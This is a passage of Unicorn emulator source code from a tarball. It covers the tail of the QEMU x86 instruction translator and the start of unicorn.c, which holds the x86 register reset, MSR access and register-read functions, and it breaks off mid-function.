uc->tcg_ctx; tcg_ctx->cpu_cc_op = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, cc_op), "cc_op"); tcg_ctx->cpu_cc_dst = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, cc_dst), "cc_dst"); tcg_ctx->cpu_cc_src = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, cc_src), "cc_src"); tcg_ctx->cpu_cc_src2 = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, cc_src2), "cc_src2"); for (i = 0; i < CPU_NB_REGS; ++i) { tcg_ctx->cpu_regs[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, regs[i]), reg_names[i]); } for (i = 0; i < 6; ++i) { tcg_ctx->cpu_seg_base[i] = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, segs[i].base), seg_base_names[i]); } for (i = 0; i < 4; ++i) { tcg_ctx->cpu_bndl[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, bnd_regs[i].lb), bnd_regl_names[i]); tcg_ctx->cpu_bndu[i] = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUX86State, bnd_regs[i].ub), bnd_regu_names[i]); } } static void i386_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = cpu->uc->tcg_ctx; CPUX86State *env = cpu->env_ptr; uint32_t flags = dc->base.tb->flags; target_ulong cs_base = dc->base.tb->cs_base; // unicorn setup dc->uc = cpu->uc; dc->pe = (flags >> HF_PE_SHIFT) & 1; dc->code32 = (flags >> HF_CS32_SHIFT) & 1; dc->ss32 = (flags >> HF_SS32_SHIFT) & 1; dc->addseg = (flags >> HF_ADDSEG_SHIFT) & 1; dc->f_st = 0; dc->vm86 = (flags >> VM_SHIFT) & 1; dc->cpl = (flags >> HF_CPL_SHIFT) & 3; dc->iopl = (flags >> IOPL_SHIFT) & 3; dc->tf = (flags >> TF_SHIFT) & 1; dc->cc_op = CC_OP_DYNAMIC; dc->cc_op_dirty = false; dc->cs_base = cs_base; dc->popl_esp_hack = 0; /* select memory access functions */ dc->mem_index = 0; dc->mem_index = cpu_mmu_index(env, false); dc->cpuid_features = env->features[FEAT_1_EDX]; dc->cpuid_ext_features = env->features[FEAT_1_ECX]; dc->cpuid_ext2_features = env->features[FEAT_8000_0001_EDX]; dc->cpuid_ext3_features = env->features[FEAT_8000_0001_ECX]; dc->cpuid_7_0_ebx_features = env->features[FEAT_7_0_EBX]; dc->cpuid_xsave_features = env->features[FEAT_XSAVE]; #ifdef TARGET_X86_64 dc->lma = (flags >> HF_LMA_SHIFT) & 1; dc->code64 = (flags >> HF_CS64_SHIFT) & 1; #endif dc->flags = flags; dc->jmp_opt = !(dc->tf || dc->base.singlestep_enabled || (flags & HF_INHIBIT_IRQ_MASK)); /* Do not optimize repz jumps at all in icount mode, because rep movsS instructions are execured with different paths in !repz_opt and repz_opt modes. The first one was used always except single step mode. And this setting disables jumps optimization and control paths become equivalent in run and single step modes. Now there will be no jump optimization for repz in record/replay modes and there will always be an additional step for ecx=0 when icount is enabled. */ dc->repz_opt = !dc->jmp_opt && !(tb_cflags(dc->base.tb) & CF_USE_ICOUNT); #if 0 /* check addseg logic */ if (!dc->addseg && (dc->vm86 || !dc->pe || !dc->code32)) printf("ERROR addseg\n"); #endif dc->T0 = tcg_temp_new(tcg_ctx); dc->T1 = tcg_temp_new(tcg_ctx); dc->A0 = tcg_temp_new(tcg_ctx); dc->tmp0 = tcg_temp_new(tcg_ctx); dc->tmp1_i64 = tcg_temp_new_i64(tcg_ctx); dc->tmp2_i32 = tcg_temp_new_i32(tcg_ctx); dc->tmp3_i32 = tcg_temp_new_i32(tcg_ctx); dc->tmp4 = tcg_temp_new(tcg_ctx); dc->ptr0 = tcg_temp_new_ptr(tcg_ctx); dc->ptr1 = tcg_temp_new_ptr(tcg_ctx); dc->cc_srcT = tcg_temp_local_new(tcg_ctx); } static void i386_tr_tb_start(DisasContextBase *db, CPUState *cpu) { } static void i386_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; dc->prev_pc = dc->base.pc_next - dc->cs_base; tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, dc->cc_op); } static bool i386_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cpu, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); /* If RF is set, suppress an internally generated breakpoint. */ int flags = dc->base.tb->flags & HF_RF_MASK ? BP_GDB : BP_ANY; if (bp->flags & flags) { gen_debug(dc, dc->base.pc_next - dc->cs_base); dc->base.is_jmp = DISAS_NORETURN; /* The address covered by the breakpoint must be included in [tb->pc, tb->pc + tb->size) in order to for it to be properly cleared -- thus we increment the PC here so that the generic logic setting tb->size later does the right thing. */ dc->base.pc_next += 1; return true; } else { return false; } } static void i386_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); target_ulong pc_next; pc_next = disas_insn(dc, cpu); if (dc->tf || (dc->base.tb->flags & HF_INHIBIT_IRQ_MASK)) { /* if single step mode, we generate only one instruction and generate an exception */ /* if irq were inhibited with HF_INHIBIT_IRQ_MASK, we clear the flag and abort the translation to give the irqs a chance to happen */ dc->base.is_jmp = DISAS_TOO_MANY; } else if ((tb_cflags(dc->base.tb) & CF_USE_ICOUNT) && ((pc_next & TARGET_PAGE_MASK) != ((pc_next + TARGET_MAX_INSN_SIZE - 1) & TARGET_PAGE_MASK) || (pc_next & ~TARGET_PAGE_MASK) == 0)) { /* Do not cross the boundary of the pages in icount mode, it can cause an exception. Do it only when boundary is crossed by the first instruction in the block. If current instruction already crossed the bound - it's ok, because an exception hasn't stopped this code. */ dc->base.is_jmp = DISAS_TOO_MANY; } else if ((pc_next - dc->base.pc_first) >= (TARGET_PAGE_SIZE - 32)) { dc->base.is_jmp = DISAS_TOO_MANY; } dc->base.pc_next = pc_next; } static void i386_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); if (dc->base.is_jmp == DISAS_TOO_MANY) { gen_jmp_im(dc, dc->base.pc_next - dc->cs_base); gen_eob(dc); } } static const TranslatorOps i386_tr_ops = { .init_disas_context = i386_tr_init_disas_context, .tb_start = i386_tr_tb_start, .insn_start = i386_tr_insn_start, .breakpoint_check = i386_tr_breakpoint_check, .translate_insn = i386_tr_translate_insn, .tb_stop = i386_tr_tb_stop, }; /* generate intermediate code for basic block 'tb'. */ void gen_intermediate_code(CPUState *cpu, TranslationBlock *tb, int max_insns) { DisasContext dc; memset(&dc, 0, sizeof(dc)); translator_loop(&i386_tr_ops, &dc.base, cpu, tb, max_insns); } void restore_state_to_opc(CPUX86State *env, TranslationBlock *tb, target_ulong *data) { int cc_op = data[1]; env->eip = data[0] - tb->cs_base; if (cc_op != CC_OP_DYNAMIC) { env->cc_op = cc_op; } } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/unicorn.c������������������������������������������������������������0000664�0000000�0000000�00000173406�14675241067�0017766�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "uc_priv.h" #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include <unicorn/x86.h> /* needed for uc_x86_mmr */ #include "unicorn.h" #define FPST(n) (env->fpregs[(env->fpstt + (n)) & 7].d) #define X86_NON_CS_FLAGS (DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK) static void load_seg_16_helper(CPUX86State *env, int seg, uint32_t selector) { cpu_x86_load_seg_cache(env, seg, selector, (selector << 4), 0xffff, X86_NON_CS_FLAGS); } void cpu_get_fp80(uint64_t *pmant, uint16_t *pexp, floatx80 f); floatx80 cpu_set_fp80(uint64_t mant, uint16_t upper); extern void helper_wrmsr(CPUX86State *env); extern void helper_rdmsr(CPUX86State *env); static void x86_set_pc(struct uc_struct *uc, uint64_t address) { if (uc->mode == UC_MODE_16) { int16_t cs = (uint16_t)X86_CPU(uc->cpu)->env.segs[R_CS].selector; ((CPUX86State *)uc->cpu->env_ptr)->eip = address - cs * 16; } else ((CPUX86State *)uc->cpu->env_ptr)->eip = address; } static uint64_t x86_get_pc(struct uc_struct *uc) { if (uc->mode == UC_MODE_16) { return X86_CPU(uc->cpu)->env.segs[R_CS].selector * 16 + ((CPUX86State *)uc->cpu->env_ptr)->eip; } else { return ((CPUX86State *)uc->cpu->env_ptr)->eip; } } static void x86_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; X86CPU *cpu = (X86CPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; X86CPUClass *xcc = X86_CPU_GET_CLASS(cpu); release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } free(xcc->model); } static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->regs, 0, sizeof(env->regs)); memset(env->segs, 0, sizeof(env->segs)); memset(env->cr, 0, sizeof(env->cr)); memset(&env->ldt, 0, sizeof(env->ldt)); memset(&env->gdt, 0, sizeof(env->gdt)); memset(&env->tr, 0, sizeof(env->tr)); memset(&env->idt, 0, sizeof(env->idt)); env->eip = 0; cpu_load_eflags(env, 0, -1); env->cc_op = CC_OP_EFLAGS; env->fpstt = 0; /* top of stack index */ env->fpus = 0; env->fpuc = 0; memset(env->fptags, 0, sizeof(env->fptags)); /* 0 = valid, 1 = empty */ env->mxcsr = 0; memset(env->xmm_regs, 0, sizeof(env->xmm_regs)); memset(&env->xmm_t0, 0, sizeof(env->xmm_t0)); memset(&env->mmx_t0, 0, sizeof(env->mmx_t0)); memset(env->ymmh_regs, 0, sizeof(env->ymmh_regs)); memset(env->opmask_regs, 0, sizeof(env->opmask_regs)); memset(env->zmmh_regs, 0, sizeof(env->zmmh_regs)); /* sysenter registers */ env->sysenter_cs = 0; env->sysenter_esp = 0; env->sysenter_eip = 0; env->efer = 0; env->star = 0; env->vm_hsave = 0; env->tsc = 0; env->tsc_adjust = 0; env->tsc_deadline = 0; env->mcg_status = 0; env->msr_ia32_misc_enable = 0; env->msr_ia32_feature_control = 0; env->msr_fixed_ctr_ctrl = 0; env->msr_global_ctrl = 0; env->msr_global_status = 0; env->msr_global_ovf_ctrl = 0; memset(env->msr_fixed_counters, 0, sizeof(env->msr_fixed_counters)); memset(env->msr_gp_counters, 0, sizeof(env->msr_gp_counters)); memset(env->msr_gp_evtsel, 0, sizeof(env->msr_gp_evtsel)); #ifdef TARGET_X86_64 memset(env->hi16_zmm_regs, 0, sizeof(env->hi16_zmm_regs)); env->lstar = 0; env->cstar = 0; env->fmask = 0; env->kernelgsbase = 0; #endif // TODO: reset other registers in CPUX86State qemu/target-i386/cpu.h // properly initialize internal setup for each mode switch (uc->mode) { default: break; case UC_MODE_16: env->hflags = 0; env->cr[0] = 0; // undo the damage done by the memset of env->segs above // for R_CS, not quite the same as x86_cpu_reset cpu_x86_load_seg_cache(env, R_CS, 0, 0, 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); // remainder yields same state as x86_cpu_reset load_seg_16_helper(env, R_DS, 0); load_seg_16_helper(env, R_ES, 0); load_seg_16_helper(env, R_SS, 0); load_seg_16_helper(env, R_FS, 0); load_seg_16_helper(env, R_GS, 0); break; case UC_MODE_32: env->hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_OSFXSR_MASK; cpu_x86_update_cr0(env, CR0_PE_MASK); // protected mode break; case UC_MODE_64: env->hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_CS64_MASK | HF_LMA_MASK | HF_OSFXSR_MASK; env->hflags &= ~(HF_ADDSEG_MASK); env->efer |= MSR_EFER_LMA | MSR_EFER_LME; // extended mode activated cpu_x86_update_cr0(env, CR0_PE_MASK); // protected mode /* If we are operating in 64bit mode then add the Long Mode flag * to the CPUID feature flag */ env->features[FEAT_8000_0001_EDX] |= CPUID_EXT2_LM; break; } } static int x86_msr_read(CPUX86State *env, uc_x86_msr *msr) { uint64_t ecx = env->regs[R_ECX]; uint64_t eax = env->regs[R_EAX]; uint64_t edx = env->regs[R_EDX]; env->regs[R_ECX] = msr->rid; helper_rdmsr(env); msr->value = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); env->regs[R_EAX] = eax; env->regs[R_ECX] = ecx; env->regs[R_EDX] = edx; /* The implementation doesn't throw exception or return an error if there is * one, so we will return 0. */ return 0; } static int x86_msr_write(CPUX86State *env, uc_x86_msr *msr) { uint64_t ecx = env->regs[R_ECX]; uint64_t eax = env->regs[R_EAX]; uint64_t edx = env->regs[R_EDX]; env->regs[R_ECX] = msr->rid; env->regs[R_EAX] = (unsigned int)msr->value; env->regs[R_EDX] = (unsigned int)(msr->value >> 32); helper_wrmsr(env); env->regs[R_ECX] = ecx; env->regs[R_EAX] = eax; env->regs[R_EDX] = edx; /* The implementation doesn't throw exception or return an error if there is * one, so we will return 0. */ return 0; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUX86State *env = _env; uc_err ret = UC_ERR_ARG; switch (regid) { default: break; case UC_X86_REG_FP0: case UC_X86_REG_FP1: case UC_X86_REG_FP2: case UC_X86_REG_FP3: case UC_X86_REG_FP4: case UC_X86_REG_FP5: case UC_X86_REG_FP6: case UC_X86_REG_FP7: { CHECK_REG_TYPE(char[10]); floatx80 reg = env->fpregs[regid - UC_X86_REG_FP0].d; cpu_get_fp80(value, (uint16_t *)((char *)value + sizeof(uint64_t)), reg); return ret; } case UC_X86_REG_FPSW: { CHECK_REG_TYPE(uint16_t); uint16_t fpus = env->fpus; fpus = fpus & ~0x3800; fpus |= (env->fpstt & 0x7) << 11; *(uint16_t *)value = fpus; return ret; } case UC_X86_REG_FPCW: CHECK_REG_TYPE(uint16_t); *(uint16_t *)value = env->fpuc; return ret; case UC_X86_REG_FPTAG: { CHECK_REG_TYPE(uint16_t); #define EXPD(fp) (fp.l.upper & 0x7fff) #define MANTD(fp) (fp.l.lower) #define MAXEXPD 0x7fff int fptag, exp, i; uint64_t mant; CPU_LDoubleU tmp; fptag = 0; for (i = 7; i >= 0; i--) { fptag <<= 2; if (env->fptags[i]) { fptag |= 3; } else { tmp.d = env->fpregs[i].d; exp = EXPD(tmp); mant = MANTD(tmp); if (exp == 0 && mant == 0) { /* zero */ fptag |= 1; } else if (exp == 0 || exp == MAXEXPD || (mant & (1LL << 63)) == 0) { /* NaNs, infinity, denormal */ fptag |= 2; } } } *(uint16_t *)value = fptag; return ret; } case UC_X86_REG_XMM0: case UC_X86_REG_XMM1: case UC_X86_REG_XMM2: case UC_X86_REG_XMM3: case UC_X86_REG_XMM4: case UC_X86_REG_XMM5: case UC_X86_REG_XMM6: case UC_X86_REG_XMM7: { CHECK_REG_TYPE(float64[2]); float64 *dst = (float64 *)value; ZMMReg *reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_XMM0]; dst[0] = reg->ZMM_Q(0); dst[1] = reg->ZMM_Q(1); return ret; } case UC_X86_REG_ST0: case UC_X86_REG_ST1: case UC_X86_REG_ST2: case UC_X86_REG_ST3: case UC_X86_REG_ST4: case UC_X86_REG_ST5: case UC_X86_REG_ST6: case UC_X86_REG_ST7: { CHECK_REG_TYPE(char[10]); memcpy(value, &FPST(regid - UC_X86_REG_ST0), 10); return ret; } case UC_X86_REG_YMM0: case UC_X86_REG_YMM1: case UC_X86_REG_YMM2: case UC_X86_REG_YMM3: case UC_X86_REG_YMM4: case UC_X86_REG_YMM5: case UC_X86_REG_YMM6: case UC_X86_REG_YMM7: case UC_X86_REG_YMM8: case UC_X86_REG_YMM9: case UC_X86_REG_YMM10: case UC_X86_REG_YMM11: case UC_X86_REG_YMM12: case UC_X86_REG_YMM13: case UC_X86_REG_YMM14: case UC_X86_REG_YMM15: { CHECK_REG_TYPE(float64[4]); float64 *dst = (float64 *)value; ZMMReg *lo_reg = (ZMMReg *)&env->xmm_regs[regid - UC_X86_REG_YMM0]; XMMReg *hi_reg = &env->ymmh_regs[regid - UC_X86_REG_YMM0]; dst[0] = lo_reg->ZMM_Q(0); dst[1] = lo_reg->ZMM_Q(1); dst[2] = hi_reg->_d[0]; dst[3] = hi_reg->_d[1]; return ret; } case UC_X86_REG_FIP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->fpip; return ret; case UC_X86_REG_FCS: CHECK_REG_TYPE(uint16_t); *(uint16_t *)value = env->fpcs; return ret; case UC_X86_REG_FDP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->fpdp; return ret; case UC_X86_REG_FDS: CHECK_REG_TYPE(uint16_t); *(uint16_t *)value = env->fpds; return ret; case UC_X86_REG_FOP: CHECK_REG_TYPE(uint16_t); *(uint16_t *)value = env->fpop; return ret; } switch (mode) { default: break; case UC_MODE_16: switch (regid) { default: break; case UC_X86_REG_ES: CHECK_REG_TYPE(int16_t); *(int16_t *)value = env->segs[R_ES].selector; return ret; case UC_X86_REG_SS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = env->segs[R_SS].selector; return ret; case UC_X86_REG_DS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = env->segs[R_DS].selector; return ret; case UC_X86_REG_FS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = env->segs[R_FS].selector; return ret; case UC_X86_REG_GS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = env->segs[R_GS].selector; return ret; case UC_X86_REG_FS_BASE: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = (uint32_t)env->segs[R_FS].base; return ret; } // fall-thru case UC_MODE_32: switch (regid) { default: break; case UC_X86_REG_CR0: case UC_X86_REG_CR1: case UC_X86_REG_CR2: case UC_X86_REG_CR3: case UC_X86_REG_CR4: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->cr[regid - UC_X86_REG_CR0]; break; case UC_X86_REG_DR0: case UC_X86_REG_DR1: case UC_X86_REG_DR2: case UC_X86_REG_DR3: case UC_X86_REG_DR4: case UC_X86_REG_DR5: case UC_X86_REG_DR6: case UC_X86_REG_DR7: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->dr[regid - UC_X86_REG_DR0]; break; case UC_X86_REG_FLAGS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = cpu_compute_eflags(env); break; case UC_X86_REG_EFLAGS: CHECK_REG_TYPE(int32_t); *(int32_t *)value = cpu_compute_eflags(env); break; case UC_X86_REG_EAX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_EAX]; break; case UC_X86_REG_AX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EAX]); break; case UC_X86_REG_AH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EAX]); break; case UC_X86_REG_AL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EAX]); break; case UC_X86_REG_EBX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_EBX]; break; case UC_X86_REG_BX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EBX]); break; case UC_X86_REG_BH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EBX]); break; case UC_X86_REG_BL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EBX]); break; case UC_X86_REG_ECX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_ECX]; break; case UC_X86_REG_CX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ECX]); break; case UC_X86_REG_CH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_ECX]); break; case UC_X86_REG_CL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_ECX]); break; case UC_X86_REG_EDX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_EDX]; break; case UC_X86_REG_DX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EDX]); break; case UC_X86_REG_DH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EDX]); break; case UC_X86_REG_DL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EDX]); break; case UC_X86_REG_ESP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_ESP]; break; case UC_X86_REG_SP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ESP]); break; case UC_X86_REG_EBP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_EBP]; break; case UC_X86_REG_BP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EBP]); break; case UC_X86_REG_ESI: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_ESI]; break; case UC_X86_REG_SI: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ESI]); break; case UC_X86_REG_EDI: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->regs[R_EDI]; break; case UC_X86_REG_DI: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EDI]); break; case UC_X86_REG_EIP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = env->eip; break; case UC_X86_REG_IP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->eip); break; case UC_X86_REG_CS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_CS].selector; break; case UC_X86_REG_DS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_DS].selector; break; case UC_X86_REG_SS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_SS].selector; break; case UC_X86_REG_ES: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_ES].selector; break; case UC_X86_REG_FS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_FS].selector; break; case UC_X86_REG_GS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = (uint16_t)env->segs[R_GS].selector; break; case UC_X86_REG_IDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = (uint16_t)env->idt.limit; ((uc_x86_mmr *)value)->base = (uint32_t)env->idt.base; break; case UC_X86_REG_GDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = (uint16_t)env->gdt.limit; ((uc_x86_mmr *)value)->base = (uint32_t)env->gdt.base; break; case UC_X86_REG_LDTR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = env->ldt.limit; ((uc_x86_mmr *)value)->base = (uint32_t)env->ldt.base; ((uc_x86_mmr *)value)->selector = (uint16_t)env->ldt.selector; ((uc_x86_mmr *)value)->flags = env->ldt.flags; break; case UC_X86_REG_TR: CHECK_REG_TYPE(uc_x86_mmr); ((uc_x86_mmr *)value)->limit = env->tr.limit; ((uc_x86_mmr *)value)->base = (uint32_t)env->tr.base; ((uc_x86_mmr *)value)->selector = (uint16_t)env->tr.selector; ((uc_x86_mmr *)value)->flags = env->tr.flags; break; case UC_X86_REG_MSR: CHECK_REG_TYPE(uc_x86_msr); x86_msr_read(env, (uc_x86_msr *)value); break; case UC_X86_REG_MXCSR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->mxcsr; break; case UC_X86_REG_FS_BASE: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = (uint32_t)env->segs[R_FS].base; break; } break; #ifdef TARGET_X86_64 case UC_MODE_64: switch (regid) { default: break; case UC_X86_REG_CR0: case UC_X86_REG_CR1: case UC_X86_REG_CR2: case UC_X86_REG_CR3: case UC_X86_REG_CR4: CHECK_REG_TYPE(int64_t); *(int64_t *)value = env->cr[regid - UC_X86_REG_CR0]; break; case UC_X86_REG_DR0: case UC_X86_REG_DR1: case UC_X86_REG_DR2: case UC_X86_REG_DR3: case UC_X86_REG_DR4: case UC_X86_REG_DR5: case UC_X86_REG_DR6: case UC_X86_REG_DR7: CHECK_REG_TYPE(int64_t); *(int64_t *)value = env->dr[regid - UC_X86_REG_DR0]; break; case UC_X86_REG_FLAGS: CHECK_REG_TYPE(int16_t); *(int16_t *)value = cpu_compute_eflags(env); break; case UC_X86_REG_EFLAGS: CHECK_REG_TYPE(int32_t); *(int32_t *)value = cpu_compute_eflags(env); break; case UC_X86_REG_RFLAGS: CHECK_REG_TYPE(int64_t); *(int64_t *)value = cpu_compute_eflags(env); break; case UC_X86_REG_RAX: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_EAX]; break; case UC_X86_REG_EAX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_EAX]); break; case UC_X86_REG_AX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EAX]); break; case UC_X86_REG_AH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EAX]); break; case UC_X86_REG_AL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EAX]); break; case UC_X86_REG_RBX: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_EBX]; break; case UC_X86_REG_EBX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_EBX]); break; case UC_X86_REG_BX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EBX]); break; case UC_X86_REG_BH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EBX]); break; case UC_X86_REG_BL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EBX]); break; case UC_X86_REG_RCX: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_ECX]; break; case UC_X86_REG_ECX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_ECX]); break; case UC_X86_REG_CX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ECX]); break; case UC_X86_REG_CH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_ECX]); break; case UC_X86_REG_CL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_ECX]); break; case UC_X86_REG_RDX: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_EDX]; break; case UC_X86_REG_EDX: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_EDX]); break; case UC_X86_REG_DX: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EDX]); break; case UC_X86_REG_DH: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_H(env->regs[R_EDX]); break; case UC_X86_REG_DL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EDX]); break; case UC_X86_REG_RSP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_ESP]; break; case UC_X86_REG_ESP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_ESP]); break; case UC_X86_REG_SP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ESP]); break; case UC_X86_REG_SPL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_ESP]); break; case UC_X86_REG_RBP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_EBP]; break; case UC_X86_REG_EBP: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_EBP]); break; case UC_X86_REG_BP: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_EBP]); break; case UC_X86_REG_BPL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_EBP]); break; case UC_X86_REG_RSI: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->regs[R_ESI]; break; case UC_X86_REG_ESI: CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->regs[R_ESI]); break; case UC_X86_REG_SI: CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->regs[R_ESI]); break; case UC_X86_REG_SIL: CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->regs[R_ESI]); break; case UC_X86_REG_RDI: CHECK_REG_TYPE(uint64_t); 